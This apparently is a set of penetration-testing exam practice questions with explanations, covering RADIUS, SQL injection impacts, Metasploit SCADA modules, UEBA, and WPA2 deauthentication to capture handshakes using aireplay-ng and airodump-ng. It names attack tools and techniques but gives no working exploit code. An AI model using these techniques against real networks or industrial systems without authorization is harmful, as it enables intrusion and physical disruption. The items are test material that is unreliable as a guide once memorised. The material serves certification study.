D. RADIUS Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect to and use a network service. RADIUS is a client/server protocol that runs in the application layer; it normally uses UDP (ports 1812 for authentication and 1813 for accounting, with the legacy 1645/1646 still seen), and RADIUS over TCP is defined separately in RFC 6613. Network access servers, which control access to a network, usually contain a RADIUS client component that communicates with the RADIUS server. RADIUS is often the back-end of choice for 802.1X authentication. A RADIUS server is usually a background process running on UNIX or Microsoft Windows. DIAMETER is RADIUS's successor, TACACS+ is Cisco's AAA protocol that separates the three functions, and Kerberos is a ticket-based authentication protocol rather than an AAA protocol for remote access.

With which of the following SQL injection attacks can an attacker deface a web page, modify or add data stored in a database and compromised data integrity? A. Loss of data availability. B. Information Disclosure. C. Compromised Data Integrity. D. Unauthorized access to an application.

C. Compromised Data Integrity. Defacing a web page and modifying or adding records are integrity impacts, so this is the category the question describes. With a successful SQL injection an attacker can cause: Compromised data integrity. Because SQL statements also modify and insert records, an attacker can use injection to change or add data stored in the database, for example to deface a page whose content is served from a table. Unauthorized access to an application. An attacker can bypass the application's authentication mechanism and gain illegitimate access to it. Information disclosure. An attack can lead to complete data leakage from the database server. Loss of data availability. An attacker can delete records from the database server.

During your reconnaissance, you have determined that your client has devices used to send remote control signals to industrial assets used by their critical infrastructure utilities connected to their corporate network. Which of the following methods would MOST likely be the best method for exploiting these systems? A. Use social engineering to trick a user into opening a malicious APK B. Use a spear phishing campaign to trick a user into installing a RAT C. Identify a jailbroken device for easy exploitation D. Use Metasploit modules designed to target the SCADA systems

D. Use Metasploit modules designed to target the SCADA systems A penetration tester can exploit supervisory control and data acquisition (SCADA) systems if they are within the engagement's scope. While Metasploit was initially designed for engagements against workstations and servers, it has several modules in the exploit/windows/scada category that target vendor-specific SCADA components running on Windows. Many of these trigger a buffer overflow, so be careful when using them against live control systems (a crash can stop a physical process) and ensure your written authorization explicitly covers these devices. The other options target mobile devices (APKs, jailbreaks) or users rather than the industrial equipment itself.

Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices? A. Installation of anti-virus tools B. Use of a host-based IDS or IPS C. Implement endpoint protection platforms D. User and entity behavior analytics

D. User and entity behavior analytics Since ICS, SCADA, and IoT devices often run proprietary, inaccessible, or unpatchable operating systems, the traditional tools used to detect the presence of malicious cyber activity in normal enterprise networks will not function properly. Therefore, user and entity behavior analytics (UEBA) is best suited to detect and classify known-good behavior from these systems to create a baseline. Once a known-good baseline is established, deviations can be detected and analyzed. UEBA may be heavily dependent on advanced computing techniques like artificial intelligence and machine learning and may have a higher false-positive rate. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and embedded hardware, such as the Internet of Things (IoT) devices. Traditional technologies include anti-virus tools, host-based IDS and IPS, and endpoint protection platforms.

Which of the following vulnerabilities is the greatest threat to data confidentiality? A. HTTP TRACE/TRACK methods enabled B. SSL Server with SSLv3 enabled vulnerability C. phpinfo information disclosure vulnerability D. Web application SQL injection vulnerability

D. Web application SQL injection vulnerability Each vulnerability mentioned poses a significant risk, but the greatest threat comes from the SQL injection. An SQL injection could allow an attacker to retrieve our data from the backend database directly. Using this technique, the attacker could also alter the data and put it back, and nobody would notice everything that had been changed, thereby also affecting our data integrity. Wrong Answers The HTTP TRACE/TRACK methods are normally used to return the full HTTP request to the requesting client for proxy-debugging purposes and allow the attacker to access sensitive information in the HTTP headers. Since this only exposes information in the headers, it minimizes the risk to our system's data confidentiality. An SSL server with SSLv3 enabled is not ideal since this is an older encryption type, but it still provides some confidentiality. The phpinfo information disclosure vulnerability prints out detailed information on both the system and the PHP configuration. This information by itself doesn't disclose any information about the data stored within the system, though, so it isn't a great threat to our data's confidentiality.

You are conducting a wireless penetration test against an organization. You have been monitoring the WPA2 encrypted network for almost an hour but have been unable to successfully capture a handshake. Which of the following exploits should you use to increase your chances of capturing a handshake? A. Fragmentation attack B. Deauthentication attack C. Karma attack D. Downgrade attack

B. Deauthentication attack Deauthentication attacks are used in the service of evil twin, replay, cracking, denial-of-service and other attacks. All 802.11 Wi-Fi variants include an unauthenticated management frame that a client or access point can use to announce that it is terminating the association. The attacker spoofs the victim's MAC address (or the access point's) and sends deauthentication frames, so the victim's device is kicked off the access point. If the user is still using the network, the wireless adapter automatically reconnects and performs the WPA2 4-way handshake again, which lets the attacker capture that handshake during the reconnection (for example with aireplay-ng --deauth while airodump-ng records the channel) and then crack it offline. Networks that enforce 802.11w Protected Management Frames ignore spoofed deauthentication frames, so the attack does not work against them.

